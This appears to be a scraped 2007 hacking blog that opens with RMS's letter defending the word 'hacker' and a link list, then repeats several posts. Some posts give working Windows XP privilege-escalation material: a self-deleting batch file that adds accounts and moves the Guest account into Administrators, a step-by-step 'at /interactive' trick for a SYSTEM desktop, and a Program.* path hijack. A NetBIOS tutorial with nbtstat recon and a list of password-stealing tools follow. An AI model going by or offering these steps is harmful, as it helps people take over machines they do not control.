* Contribute to organizations like the Free Software Foundation that promote the production of high-quality free software. You can reach the Free Software Foundation at gnu@prep.ai.mit.edu, by phone at +1-617-542-5942, or by snail-mail at 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.
* Support the League for Programming Freedom, which opposes over-broad software patents that constantly threaten to blow up in hackers' faces, preventing them from developing innovative software for tomorrow's needs. You can reach the League for Programming Freedom at lpf@uunet.uu.net. by phone at +1 617 621 7084, or by snail-mail at 1 Kendall Square #143, P.O.Box 9171, Cambridge, Massachusetts 02139 USA.
* If you do nothing else, please help fight government attempts to seize political control of Internet content and restrict strong cryptography. As TNHD III went to press, the so-called `Communications Decency Act' had just been declared "unconstitutional on its face" by a Federal court, but the government is expected to appeal. If it's still law when you read this, please join the effort by the Citizens' Internet Empowerment Coalition lawsuit to have the CDA quashed or repealed. Surf to the Center for Democracy and technology's home page at http://www.cdt.org to see what you can do to help fight censorship of the net.
Here's the text of a letter RMS wrote to the Wall Street Journal to complain about their policy of using "hacker" only in a pejorative sense. We hear that most major newspapers have the same policy. If you'd like to help change this situation, send your favorite newspaper the same letter -- or, better yet, write your own letter.
Dear Editor:
This letter is not meant for publication, although you can publish it if you wish. It is meant specifically for you, the editor, not the public.
I am a hacker. That is to say, I enjoy playing with computers -- working with, learning about, and writing clever computer programs. I am not a cracker; I don't make a practice of breaking computer security.
There's nothing shameful about the hacking I do. But when I tell people I am a hacker, people think I'm admitting something naughty -- because newspapers such as yours misuse the word "hacker", giving the impression that it means "security breaker" and nothing else. You are giving hackers a bad name.
The saddest thing is that this problem is perpetuated deliberately. Your reporters know the difference between "hacker" and "security breaker". They know how to make the distinction, but you don't let them! You insist on using "hacker" pejoratively. When reporters try to use another word, you change it. When reporters try to explain the other meanings, you cut it.
Of course, you have a reason. You say that readers have become used to your insulting usage of "hacker", so that you cannot change it now. Well, you can't undo past mistakes today; but that is no excuse to repeat them tomorrow.
If I were what you call a "hacker", at this point I would threaten to crack your computer and crash it. But I am a hacker, not a cracker. I don't do that kind of thing! I have enough computers to play with at home and at work; I don't need yours. Besides, it's not my way to respond to insults with violence. My response is this letter.
You owe hackers an apology; but more than that, you owe us ordinary respect.
Sincerely, etc.
MONDAY, SEPTEMBER 3, 2007
some links
http://www.showmyip.com/
http://sainathgupta-hacking.blogspot.com/
http://www.securitytaskforce.org/
http://www.blackhat.com/
http://www.blackhat.com/html/bh-usa-06/bh-usa-06-speakers.html
http://www.nag.co.in/ncise.htm
http://www.wtcs.org/snmp4tpc/freeware.htm
http://www.wireshark.org/
http://www.grc.com/default.htm
http://www.thinkdigit.com/index.php?action=pro_how_to&prodid=679
http://www.snort.org/
http://prasadswork.blogspot.com/
http://crack0hack.wetpaint.com/?t=anon
http://www.discoverhacking.c-o.in/
http://crack0hack.wetpaint.com/page/Best+Hacking+Softwares_+1000sw%28Free+download%29
http://www.remote-exploit.org/backtrack_download.html
http://crack0hack.wetpaint.com/rss2_0/pageReport/created?t=anon
http://sainathgupta-hacking.blogspot.com/
http://www.securitytaskforce.org/
http://www.blackhat.com/
http://www.blackhat.com/html/bh-usa-06/bh-usa-06-speakers.html
http://www.nag.co.in/ncise.htm
http://www.wtcs.org/snmp4tpc/freeware.htm
http://www.wireshark.org/
http://www.grc.com/default.htm
http://www.thinkdigit.com/index.php?action=pro_how_to&prodid=679
http://www.snort.org/
http://prasadswork.blogspot.com/
http://crack0hack.wetpaint.com/?t=anon
http://www.discoverhacking.c-o.in/
http://crack0hack.wetpaint.com/page/Best+Hacking+Softwares_+1000sw%28Free+download%29
http://www.remote-exploit.org/backtrack_download.html
http://crack0hack.wetpaint.com/rss2_0/pageReport/created?t=anon
THURSDAY, AUGUST 30, 2007
Hack admin from xp guest account(Thats possible )
Well thats possible ..
Please Dont missuse This ARTICLE. Its meant for "Educational Purpose" only or for helping those who have lost their PASSWORD.
HaCk "GUEST" with Admin privileges........
echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0
Copy this to notepad and save the file as "Guest2admin.bat"
then u can double click the file to execute or run in the cmd.
it works...
~ Cheers ~
* Haking "admin" from "user" mode n more
really that is possible !
u know why is it a "user" account because it lacks come service layer than that in "administrator" account
Using simple command line tools on a machine running Windows XP we will obtain system level privileges, and run the entire explorer process (Desktop), and all processes that run from it have system privileges. The system run level is higher than administrator, and has full control of the operating system and it’s kernel. On many machines this can be exploited even with the guest account. At the time I’m publishing this, I have been unable to find any other mention of people running an entire desktop as system, although I have seen some articles regarding the SYSTEM command prompt.
Local privilege escalation is useful on any system that a hacker may compromise; the system account allows for several other things that aren’t normally possible (like resetting the administrator password).
The Local System account is used by the Windows OS to control various aspects of the system (kernel, services, etc); the account shows up as SYSTEM in the Task Manager
Local System differs from an Administrator account in that it has full control of the operating system, similar to root on a *nix machine. Most System processes are required by the operating system, and cannot be closed, even by an Administrator account; attempting to close them will result in a error message. The following quote from Wikipedia explains this in a easy to understand way:
You can trick the system into running a program, script, or batch file with system level privileges.
One sample
One trick is to use a vulnerability in Windows long filename support.
Try placing an executable named Program.*, in the root directory of the "Windows" drive. Then reboot. The system may run the Program.*, with system level privileges. So long as one of the applications in the "Program Files" directory is a startup app. The call to "Program Files", will be intercepted by Program.*.
Microsoft eventually caught on to that trick. Now days, more and more, of the startup applications are being coded to use limited privileges.
Quote:
In Windows NT and later systems derived from it (Windows 2000, Windows XP, Windows Server 2003 and Windows Vista), there may or may not be a superuser. By default, there is a superuser named Administrator, although it is not an exact analogue of the Unix root superuser account. Administrator does not have all the privileges of root because some superuser privileges are assigned to the Local System account in Windows NT.
Under normal circumstances, a user cannot run code as System, only the operating system itself has this ability, but by using the command line, we will trick Windows into running our desktop as System, along with all applications that are started from within.
Getting SYSTEM
I will now walk you through the process of obtaining SYSTEM privileges.
To start, lets open up a command prompt (Start > Run > cmd > [ENTER]).
At the prompt, enter the following command, then press [ENTER]:
Code:
at
If it responds with an “access denied” error, then we are out of luck, and you’ll have to try another method of privilege escalation; if it responds with “There are no entries in the list” (or sometimes with multiple entries already in the list) then we are good. Access to the at command varies, on some installations of Windows, even the Guest account can access it, on others it’s limited to Administrator accounts. If you can use the at command, enter the following commands, then press [ENTER]:
Code:
at 15:25 /interactive “cmd.exe”
Lets break down the preceding code. The “at” told the machine to run the at command, everything after that are the operators for the command, the important thing here, is to change the time (24 hour format) to one minute after the time currently set on your computers clock, for example: If your computer’s clock says it’s 4:30pm, convert this to 24 hour format (16:30) then use 16:31 as the time in the command. If you issue the at command again with no operators, then you should see something similar to this:
When the system clock reaches the time you set, then a new command prompt will magically run. The difference is that this one is running with system privileges (because it was started by the task scheduler service, which runs under the Local System account). It should look like this:
You’ll notice that the title bar has changed from cmd.exe to svchost.exe (which is short for Service Host). Now that we have our system command prompt, you may close the old one. Run Task Manager by either pressing CTRL+ALT+DELETE or typing taskmgr at the command prompt. In task manager, go to the processes tab, and kill explorer.exe; your desktop and all open folders should disappear, but the system command prompt should still be there.
At the system command prompt, enter in the following:
Code:
explorer.exe
A desktop will come back up, but what this? It isn’t your desktop. Go to the start menu and look at the user name, it should say “SYSTEM”. Also open up task manager again, and you’ll notice that explorer.exe is now running as SYSTEM. The easiest way to get back into your own desktop, is to log out and then log back in. The following 2 screenshots show my results (click to zoom):
System user name on start menu
explorer.exe running under SYSTEM
What to do now
Now that we have SYSTEM access, everything that we run from our explorer process will have it too, browsers, games, etc. You also have the ability to reset the administrators password, and kill other processes owned by SYSTEM. You can do anything on the machine, the equivalent of root; You are now God of the Windows machine. I’ll leave the rest up to your imagination.
ADMINISTRATOR IN WELCOME SCREEN.
When you install Windows XP an Administrator Account is created (you are asked to supply an administrator password), but the "Welcome Screen" does not give you the option to log on as Administrator unless you boot up in Safe Mode.
First you must ensure that the Administrator Account is enabled:
1 open Control Panel
2 open Administrative Tools
3 open Local Security Policy
4 expand Local Policies
5 click on Security Options
6 ensure that Accounts: Administrator account status is enabled Then follow the instructions from the "Win2000 Logon Screen Tweak" ie.
1 open Control Panel
2 open User Accounts
3 click Change the way users log on or log off
4 untick Use the Welcome Screen
5 click Apply Options
You will now be able to log on to Windows XP as Administrator in Normal Mode.
EASY WAY TO ADD THE ADMINISTRATOR USER TO THE WELCOME SCREEN.!!
Start the Registry Editor Go to:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList \
Right-click an empty space in the right pane and select New > DWORD Value Name the new value Administrator. Double-click this new value, and enter 1 as it's Value data. Close the registry editor and restart.
Enjoy
Please Dont missuse This ARTICLE. Its meant for "Educational Purpose" only or for helping those who have lost their PASSWORD.
HaCk "GUEST" with Admin privileges........
echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0
Copy this to notepad and save the file as "Guest2admin.bat"
then u can double click the file to execute or run in the cmd.
it works...
~ Cheers ~
* Haking "admin" from "user" mode n more
really that is possible !
u know why is it a "user" account because it lacks come service layer than that in "administrator" account
Using simple command line tools on a machine running Windows XP we will obtain system level privileges, and run the entire explorer process (Desktop), and all processes that run from it have system privileges. The system run level is higher than administrator, and has full control of the operating system and it’s kernel. On many machines this can be exploited even with the guest account. At the time I’m publishing this, I have been unable to find any other mention of people running an entire desktop as system, although I have seen some articles regarding the SYSTEM command prompt.
Local privilege escalation is useful on any system that a hacker may compromise; the system account allows for several other things that aren’t normally possible (like resetting the administrator password).
The Local System account is used by the Windows OS to control various aspects of the system (kernel, services, etc); the account shows up as SYSTEM in the Task Manager
Local System differs from an Administrator account in that it has full control of the operating system, similar to root on a *nix machine. Most System processes are required by the operating system, and cannot be closed, even by an Administrator account; attempting to close them will result in a error message. The following quote from Wikipedia explains this in a easy to understand way:
You can trick the system into running a program, script, or batch file with system level privileges.
One sample
One trick is to use a vulnerability in Windows long filename support.
Try placing an executable named Program.*, in the root directory of the "Windows" drive. Then reboot. The system may run the Program.*, with system level privileges. So long as one of the applications in the "Program Files" directory is a startup app. The call to "Program Files", will be intercepted by Program.*.
Microsoft eventually caught on to that trick. Now days, more and more, of the startup applications are being coded to use limited privileges.
Quote:
In Windows NT and later systems derived from it (Windows 2000, Windows XP, Windows Server 2003 and Windows Vista), there may or may not be a superuser. By default, there is a superuser named Administrator, although it is not an exact analogue of the Unix root superuser account. Administrator does not have all the privileges of root because some superuser privileges are assigned to the Local System account in Windows NT.
Under normal circumstances, a user cannot run code as System, only the operating system itself has this ability, but by using the command line, we will trick Windows into running our desktop as System, along with all applications that are started from within.
Getting SYSTEM
I will now walk you through the process of obtaining SYSTEM privileges.
To start, lets open up a command prompt (Start > Run > cmd > [ENTER]).
At the prompt, enter the following command, then press [ENTER]:
Code:
at
If it responds with an “access denied” error, then we are out of luck, and you’ll have to try another method of privilege escalation; if it responds with “There are no entries in the list” (or sometimes with multiple entries already in the list) then we are good. Access to the at command varies, on some installations of Windows, even the Guest account can access it, on others it’s limited to Administrator accounts. If you can use the at command, enter the following commands, then press [ENTER]:
Code:
at 15:25 /interactive “cmd.exe”
Lets break down the preceding code. The “at” told the machine to run the at command, everything after that are the operators for the command, the important thing here, is to change the time (24 hour format) to one minute after the time currently set on your computers clock, for example: If your computer’s clock says it’s 4:30pm, convert this to 24 hour format (16:30) then use 16:31 as the time in the command. If you issue the at command again with no operators, then you should see something similar to this:
When the system clock reaches the time you set, then a new command prompt will magically run. The difference is that this one is running with system privileges (because it was started by the task scheduler service, which runs under the Local System account). It should look like this:
You’ll notice that the title bar has changed from cmd.exe to svchost.exe (which is short for Service Host). Now that we have our system command prompt, you may close the old one. Run Task Manager by either pressing CTRL+ALT+DELETE or typing taskmgr at the command prompt. In task manager, go to the processes tab, and kill explorer.exe; your desktop and all open folders should disappear, but the system command prompt should still be there.
At the system command prompt, enter in the following:
Code:
explorer.exe
A desktop will come back up, but what this? It isn’t your desktop. Go to the start menu and look at the user name, it should say “SYSTEM”. Also open up task manager again, and you’ll notice that explorer.exe is now running as SYSTEM. The easiest way to get back into your own desktop, is to log out and then log back in. The following 2 screenshots show my results (click to zoom):
System user name on start menu
explorer.exe running under SYSTEM
What to do now
Now that we have SYSTEM access, everything that we run from our explorer process will have it too, browsers, games, etc. You also have the ability to reset the administrators password, and kill other processes owned by SYSTEM. You can do anything on the machine, the equivalent of root; You are now God of the Windows machine. I’ll leave the rest up to your imagination.
ADMINISTRATOR IN WELCOME SCREEN.
When you install Windows XP an Administrator Account is created (you are asked to supply an administrator password), but the "Welcome Screen" does not give you the option to log on as Administrator unless you boot up in Safe Mode.
First you must ensure that the Administrator Account is enabled:
1 open Control Panel
2 open Administrative Tools
3 open Local Security Policy
4 expand Local Policies
5 click on Security Options
6 ensure that Accounts: Administrator account status is enabled Then follow the instructions from the "Win2000 Logon Screen Tweak" ie.
1 open Control Panel
2 open User Accounts
3 click Change the way users log on or log off
4 untick Use the Welcome Screen
5 click Apply Options
You will now be able to log on to Windows XP as Administrator in Normal Mode.
EASY WAY TO ADD THE ADMINISTRATOR USER TO THE WELCOME SCREEN.!!
Start the Registry Editor Go to:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList \
Right-click an empty space in the right pane and select New > DWORD Value Name the new value Administrator. Double-click this new value, and enter 1 as it's Value data. Close the registry editor and restart.
Enjoy
MONDAY, AUGUST 27, 2007
NetBios Basic Tutorial !
I bet u wanna try ur hands on Ethical Hacking but unaware of Basic NetBios, which stands as a very important aspect. n dis is d best explanation i can offer u, written in much simpler language.
~cheers~
Preface to NetBIOS
Before you begin reading this section, understand that this section was written for the novice to the concept of NetBIOS, but - it also contains information the veteran might find educational. I am prefacing this so that I do not get e-mail like "Why did you start your NetBIOS section off so basic?" - Simple, its written for people that may be coming from an enviroment that does not use NetBIOS, so they would need me to start with basics, thanks.
Whats is NetBIOS?
NetBIOS (Network Basic Input/Output System) was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources. Since its creation, NetBIOS has become the basis for many other networking applications. In its strictest sense, NetBIOS is an interface specification for accessing networking services.
NetBIOS, a layer of software developed to link a network operating system with specific hardware, was originally designed as THE network controller for IBM's Network LAN. NetBIOS has now been extended to allow programs written using the NetBIOS interface to operate on the IBM token ring architecture. NetBIOS has since been adopted as an industry standard and now, it is common to refer to NetBIOS-compatible LANs.
It offers network applications a set of "hooks" to carry out inter-application communication and data transfer. In a basic sense, NetBIOS allows applications to talk to the network. Its intention is to isolate application programs from any type of hardware dependancies. It also spares software developers the task of developing network error recovery and low level message addressing or routing. The use of the NetBIOS interface does alot of this work for them.
NetBIOS standardizes the interface between applications and a LANs operating capabilities. With this, it can be specified to which levels of the OSI model the application can write to, making the application transportable to other networks. In a NetBIOS LAN environment, computers are known on the system by a name. Each computer on the network has a permanent name that is programmed in various different ways. These names will be discussed in more detail below.
PC's on a NetBIOS LAN communicate either by establishing a session or by using NetBIOS datagram or broadcast methods. Sessions allow for a larger message to be sent and handle error detection and correction. The communication is on a one-to-one basis. Datagram and broadcast methods allow one computer to communicate with several other computers at the same time, but are limited in message size. There is no error detection or correction using these datagram or broadcast methods. However, datagram communication allows for communication without having to establish a session.
All communication in these environments are presented to NetBIOS in a format called Network Control Blocks (NCB). The allocation of these blocks in memory is dependant on the user program. These NCB's are divided into fields, these are reserved for input and output respectively.
NetBIOS is a very common protocol used in todays environments. NetBIOS is supported on Ethernet, TokenRing, and IBM PC Networks. In its original induction, it was defined as only an interface between the application and the network adapter. Since then, transport like functions have been added to NetBIOS, making it more functional over time.
In NetBIOS, connection (TCP) oriented and connectionless (UDP) communication are both supported. It supports both broadcasts and multicasting and supports three distinct services: Naming, Session, and Datagram.
NetBIOS Names
NetBIOS names are used to identify resources on a network. Applications use these names to start and end sessions. You can configure a single machine with multiple applications, each of which has a unique NetBIOS name. Each PC that supports an application also has a NetBIOS station name that is user defined or that NetBIOS derives by internal means.
NetBIOS can consist of up to 16 alphanumeric characters. The combination of characters must be unique within the entire source routing network. Before a PC that uses NetBIOS can fully function on a network, that PC must register their NetBIOS name.
When a client becomes active, the client advertises their name. A client is considered to be registered when it can successfully advertise itself without any other client claiming it has the same name. The steps of the registration process is as follows:
1. Upon boot up, the client broadcasts itself and its NetBIOS information anywhere from 6 to 10 to ensure every other client on the network receives the information.
2. If another client on the network already has the name, that NetBIOS client issues its own broadcast to indicate that the name is in use. The client who is trying to register the already in use name, stop all attempts to register that name.
3. If no other client on the network objects to the name registration, the client will finish the registration process.
There are two types of names in a NetBIOS enviroment: Unique and Group. A unique name must be unique across the network. A group name does not have to be unique and all processes that have a given group name belong to the group. Each NetBIOS node maintains a table of all names currently owned by that node.
The NetBIOS naming convention allows for 16 characters in a NetBIOS name. Microsoft, however, limits these names to 15 characters and uses the 16th character as a NetBIOS suffix. A NetBIOS suffix is used by Microsoft Networking software to indentify the functionality installed or the registered device or service.
[QuickNote: SMB and NBT (NetBIOS over TCP/IP work very closely together and both use ports 137, 138, 139. Port 137 is NetBIOS name UDP. Port 138 is NetBIOS datagram UDP. Port 139 is NetBIOS session TCP. For further information on NetBIOS, read the paper at the rhino9 website listed above]
The following is a table of NetBIOS suffixes currently used by Microsoft WindowsNT. These suffixes are displayed in hexadecimal format.
Name Number Type Usage
==========================================================================
00 U Workstation Service
01 U Messenger Service
<\\_MSBROWSE_> 01 G Master Browser
03 U Messenger Service
06 U RAS Server Service
1F U NetDDE Service
20 U File Server Service
21 U RAS Client Service
22 U Exchange Interchange
23 U Exchange Store
24 U Exchange Directory
30 U Modem Sharing Server Service
31 U Modem Sharing Client Service
43 U SMS Client Remote Control
44 U SMS Admin Remote Control Tool
45 U SMS Client Remote Chat
46 U SMS Client Remote Transfer
4C U DEC Pathworks TCPIP Service
52 U DEC Pathworks TCPIP Service
87 U Exchange MTA
6A U Exchange IMC
BE U Network Monitor Agent
BF U Network Monitor Apps
03 U Messenger Service
00 G Domain Name
1B U Domain Master Browser
1C G Domain Controllers
1D U Master Browser
1E G Browser Service Elections
1C G Internet Information Server
00 U Internet Information Server
[2B] U Lotus Notes Server
IRISMULTICAST [2F] G Lotus Notes
IRISNAMESERVER [33] G Lotus Notes
Forte_$ND800ZA [20] U DCA Irmalan Gateway Service
Unique (U): The name may have only one IP address assigned to it. On a network device, multiple occurrences of a single name may appear to be registered, but the suffix will be unique, making the entire name unique.
Group (G): A normal group; the single name may exist with many IP addresses.
Multihomed (M): The name is unique, but due to multiple network interfaces on the same computer, this configuration is necessary to permit the registration. Maximum number of addresses is 25.
Internet Group (I): This is a special configuration of the group name used to manage WinNT domain names.
Domain Name (D): New in NT 4.0
For a quick and dirty look at a servers registered NetBIOS names and services, issue the following NBTSTAT command:
nbtstat -A [ipaddress]
nbtstat -a [host]
NetBIOS Sessions
The NetBIOS session service provides a connection-oriented, reliable, full-duplex message service to a user process. NetBIOS requires one process to be the client and the other to be the server. NetBIOS session establishment requires a preordained cooperation between the two stations. One application must have issued a Listen command when another application issues a Call command. The Listen command references a name in its NetBIOS name table (or WINS server), and also the remote name an application must use to qualify as a session partner. If the receiver (listener) is not already listening, the Call will be unsuccessful. If the call is successful, each application receives notification of session establishment with the session-id. The Send and Receive commands the transfer data. At the end of a session, either application can issue a Hang-Up command. There is no real flow control for the session service because it is assumed a LAN is fast enough to carry the required traffic.
NetBIOS Datagrams
Datagrams can be sent to a specific name, sent to all members of a group, or broadcast to the entire LAN. As with other datagram services, the NetBIOS datagrams are connectionless and unreliable. The Send_Datagram command requires the caller to specify the name of the destination. If the destination is a group name, then every member of the group receives the datagram. The caller of the Receive_Datagram command must specify the local name for which it wants to receive datagrams. The Receive_Datagram command also returns the name of the sender, in addition to the actual datagram data. If NetBIOS receives a datagram, but there are no Receive_Datagram commands pending, then the datagram is discarded.
The Send_Broadcast_Datagram command sends the message to every NetBIOS system on the local network. When a broadcast datagram is received by a NetBIOS node, every process that has issued a Receive_Broadcast_Datagram command receives the datagram. If none of these commands are outstanding when the broadcast datagram is received, the datagram is discarded.
NetBIOS enables an application to establish a session with another device and lets the network redirector and transaction protocols pass a request to and from another machine. NetBIOS does not actually manipulate the data. The NetBIOS specification defines an interface to the network protocol used to reach those services, not the protocol itself. Historically, has been paired with a network protocol called NetBEUI (network extended user interface). The association of the interface and the protocol has sometimes caused confusion, but the two are different.
Network protocols always provide at least one method for locating and connecting to a particular service on a network. This is usually accomplished by converting a node or service name to a network address (name resolution). NetBIOS service names must be resolved to an IP address before connections can be established with TCP/IP. Most NetBIOS implementations for TCP/IP accomplish name address resolution by using either broadcast or LMHOSTS files. In a Microsoft enviroment, you would probably also use a NetBIOS Namer Server known as WINS.
NetBEUI Explained
NetBEUI is an enhanced version of the NetBIOS protocol used by network operating systems. It formalizes the transport frame that was never standardized in NetBIOS and adds additional functions. The transport layer driver frequently used by Microsofts LAN Manager. NetBEUI implements the OSI LLC2 protocol. NetBEUI is the original PC networking protocol and interface designed by IBM for the LanManger Server. This protocol was later adopted by Microsoft for their networking products. It specifies the way that higher level software sends and receives messages over the NetBIOS frame protocol. This protocol runs over the standard 802.2 data-link protocol layer.
NetBIOS Scopes
A NetBIOS Scope ID provides an extended naming service for the NetBIOS over TCP/IP (Known as NBT) module. The primary purpose of a NetBIOS scope ID is to isolate NetBIOS traffic on a single network to only those nodes with the same NetBIOS scope ID. The NetBIOS scope ID is a character string that is appended to the NetBIOS name. The NetBIOS scope ID on two hosts must match, or the two hosts will not be able to communicate. The NetBIOS Scope ID also allows computers to use the same computer namee as they have different scope IDs. The Scope ID becomes a part of the NetBIOS name, making the name unique.
~cheers~
Preface to NetBIOS
Before you begin reading this section, understand that this section was written for the novice to the concept of NetBIOS, but - it also contains information the veteran might find educational. I am prefacing this so that I do not get e-mail like "Why did you start your NetBIOS section off so basic?" - Simple, its written for people that may be coming from an enviroment that does not use NetBIOS, so they would need me to start with basics, thanks.
Whats is NetBIOS?
NetBIOS (Network Basic Input/Output System) was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources. Since its creation, NetBIOS has become the basis for many other networking applications. In its strictest sense, NetBIOS is an interface specification for accessing networking services.
NetBIOS, a layer of software developed to link a network operating system with specific hardware, was originally designed as THE network controller for IBM's Network LAN. NetBIOS has now been extended to allow programs written using the NetBIOS interface to operate on the IBM token ring architecture. NetBIOS has since been adopted as an industry standard and now, it is common to refer to NetBIOS-compatible LANs.
It offers network applications a set of "hooks" to carry out inter-application communication and data transfer. In a basic sense, NetBIOS allows applications to talk to the network. Its intention is to isolate application programs from any type of hardware dependancies. It also spares software developers the task of developing network error recovery and low level message addressing or routing. The use of the NetBIOS interface does alot of this work for them.
NetBIOS standardizes the interface between applications and a LANs operating capabilities. With this, it can be specified to which levels of the OSI model the application can write to, making the application transportable to other networks. In a NetBIOS LAN environment, computers are known on the system by a name. Each computer on the network has a permanent name that is programmed in various different ways. These names will be discussed in more detail below.
PC's on a NetBIOS LAN communicate either by establishing a session or by using NetBIOS datagram or broadcast methods. Sessions allow for a larger message to be sent and handle error detection and correction. The communication is on a one-to-one basis. Datagram and broadcast methods allow one computer to communicate with several other computers at the same time, but are limited in message size. There is no error detection or correction using these datagram or broadcast methods. However, datagram communication allows for communication without having to establish a session.
All communication in these environments are presented to NetBIOS in a format called Network Control Blocks (NCB). The allocation of these blocks in memory is dependant on the user program. These NCB's are divided into fields, these are reserved for input and output respectively.
NetBIOS is a very common protocol used in todays environments. NetBIOS is supported on Ethernet, TokenRing, and IBM PC Networks. In its original induction, it was defined as only an interface between the application and the network adapter. Since then, transport like functions have been added to NetBIOS, making it more functional over time.
In NetBIOS, connection (TCP) oriented and connectionless (UDP) communication are both supported. It supports both broadcasts and multicasting and supports three distinct services: Naming, Session, and Datagram.
NetBIOS Names
NetBIOS names are used to identify resources on a network. Applications use these names to start and end sessions. You can configure a single machine with multiple applications, each of which has a unique NetBIOS name. Each PC that supports an application also has a NetBIOS station name that is user defined or that NetBIOS derives by internal means.
NetBIOS can consist of up to 16 alphanumeric characters. The combination of characters must be unique within the entire source routing network. Before a PC that uses NetBIOS can fully function on a network, that PC must register their NetBIOS name.
When a client becomes active, the client advertises their name. A client is considered to be registered when it can successfully advertise itself without any other client claiming it has the same name. The steps of the registration process is as follows:
1. Upon boot up, the client broadcasts itself and its NetBIOS information anywhere from 6 to 10 to ensure every other client on the network receives the information.
2. If another client on the network already has the name, that NetBIOS client issues its own broadcast to indicate that the name is in use. The client who is trying to register the already in use name, stop all attempts to register that name.
3. If no other client on the network objects to the name registration, the client will finish the registration process.
There are two types of names in a NetBIOS enviroment: Unique and Group. A unique name must be unique across the network. A group name does not have to be unique and all processes that have a given group name belong to the group. Each NetBIOS node maintains a table of all names currently owned by that node.
The NetBIOS naming convention allows for 16 characters in a NetBIOS name. Microsoft, however, limits these names to 15 characters and uses the 16th character as a NetBIOS suffix. A NetBIOS suffix is used by Microsoft Networking software to indentify the functionality installed or the registered device or service.
[QuickNote: SMB and NBT (NetBIOS over TCP/IP work very closely together and both use ports 137, 138, 139. Port 137 is NetBIOS name UDP. Port 138 is NetBIOS datagram UDP. Port 139 is NetBIOS session TCP. For further information on NetBIOS, read the paper at the rhino9 website listed above]
The following is a table of NetBIOS suffixes currently used by Microsoft WindowsNT. These suffixes are displayed in hexadecimal format.
Name Number Type Usage
==========================================================================
<\\_MSBROWSE_> 01 G Master Browser
IRISMULTICAST [2F] G Lotus Notes
IRISNAMESERVER [33] G Lotus Notes
Forte_$ND800ZA [20] U DCA Irmalan Gateway Service
Unique (U): The name may have only one IP address assigned to it. On a network device, multiple occurrences of a single name may appear to be registered, but the suffix will be unique, making the entire name unique.
Group (G): A normal group; the single name may exist with many IP addresses.
Multihomed (M): The name is unique, but due to multiple network interfaces on the same computer, this configuration is necessary to permit the registration. Maximum number of addresses is 25.
Internet Group (I): This is a special configuration of the group name used to manage WinNT domain names.
Domain Name (D): New in NT 4.0
For a quick and dirty look at a servers registered NetBIOS names and services, issue the following NBTSTAT command:
nbtstat -A [ipaddress]
nbtstat -a [host]
NetBIOS Sessions
The NetBIOS session service provides a connection-oriented, reliable, full-duplex message service to a user process. NetBIOS requires one process to be the client and the other to be the server. NetBIOS session establishment requires a preordained cooperation between the two stations. One application must have issued a Listen command when another application issues a Call command. The Listen command references a name in its NetBIOS name table (or WINS server), and also the remote name an application must use to qualify as a session partner. If the receiver (listener) is not already listening, the Call will be unsuccessful. If the call is successful, each application receives notification of session establishment with the session-id. The Send and Receive commands the transfer data. At the end of a session, either application can issue a Hang-Up command. There is no real flow control for the session service because it is assumed a LAN is fast enough to carry the required traffic.
NetBIOS Datagrams
Datagrams can be sent to a specific name, sent to all members of a group, or broadcast to the entire LAN. As with other datagram services, the NetBIOS datagrams are connectionless and unreliable. The Send_Datagram command requires the caller to specify the name of the destination. If the destination is a group name, then every member of the group receives the datagram. The caller of the Receive_Datagram command must specify the local name for which it wants to receive datagrams. The Receive_Datagram command also returns the name of the sender, in addition to the actual datagram data. If NetBIOS receives a datagram, but there are no Receive_Datagram commands pending, then the datagram is discarded.
The Send_Broadcast_Datagram command sends the message to every NetBIOS system on the local network. When a broadcast datagram is received by a NetBIOS node, every process that has issued a Receive_Broadcast_Datagram command receives the datagram. If none of these commands are outstanding when the broadcast datagram is received, the datagram is discarded.
NetBIOS enables an application to establish a session with another device and lets the network redirector and transaction protocols pass a request to and from another machine. NetBIOS does not actually manipulate the data. The NetBIOS specification defines an interface to the network protocol used to reach those services, not the protocol itself. Historically, has been paired with a network protocol called NetBEUI (network extended user interface). The association of the interface and the protocol has sometimes caused confusion, but the two are different.
Network protocols always provide at least one method for locating and connecting to a particular service on a network. This is usually accomplished by converting a node or service name to a network address (name resolution). NetBIOS service names must be resolved to an IP address before connections can be established with TCP/IP. Most NetBIOS implementations for TCP/IP accomplish name address resolution by using either broadcast or LMHOSTS files. In a Microsoft enviroment, you would probably also use a NetBIOS Namer Server known as WINS.
NetBEUI Explained
NetBEUI is an enhanced version of the NetBIOS protocol used by network operating systems. It formalizes the transport frame that was never standardized in NetBIOS and adds additional functions. The transport layer driver frequently used by Microsofts LAN Manager. NetBEUI implements the OSI LLC2 protocol. NetBEUI is the original PC networking protocol and interface designed by IBM for the LanManger Server. This protocol was later adopted by Microsoft for their networking products. It specifies the way that higher level software sends and receives messages over the NetBIOS frame protocol. This protocol runs over the standard 802.2 data-link protocol layer.
NetBIOS Scopes
A NetBIOS Scope ID provides an extended naming service for the NetBIOS over TCP/IP (Known as NBT) module. The primary purpose of a NetBIOS scope ID is to isolate NetBIOS traffic on a single network to only those nodes with the same NetBIOS scope ID. The NetBIOS scope ID is a character string that is appended to the NetBIOS name. The NetBIOS scope ID on two hosts must match, or the two hosts will not be able to communicate. The NetBIOS Scope ID also allows computers to use the same computer namee as they have different scope IDs. The Scope ID becomes a part of the NetBIOS name, making the name unique.
Some tool names
Hackers tools a reference ! BEWARE !!
AAh!!
The following tools m gonna list now are some of the dangerous tools available on www, which may be used on u by an unethical hacker. I want you to be well aware of all the possibilities.
They are Free to download and it takes seconds to crush up personal computer if wired online, m not disclosing the links to these tools .
Lord PS
Lord PS is an editor that will create a password stealer/virus that emails you the passwords with tons of options, options may include taking over ur entire pc and disallowing u to access any of the files
Hosein PS v1.6
Does the same job with above with less options/features, another yahoo pass stealer
Fucker PS
This is a strong multi-password stealer that will grab passwords from all the most commonly used programs/services, msn, yahoo etc
JPS v1.8
Another password grabber/stealer - e mailer that is more focuced on Yahoo messenger
Demon PS v2.3
Yahoo messenger password stealer/mailer with anti virus kill options
and other system features
Tro messenger
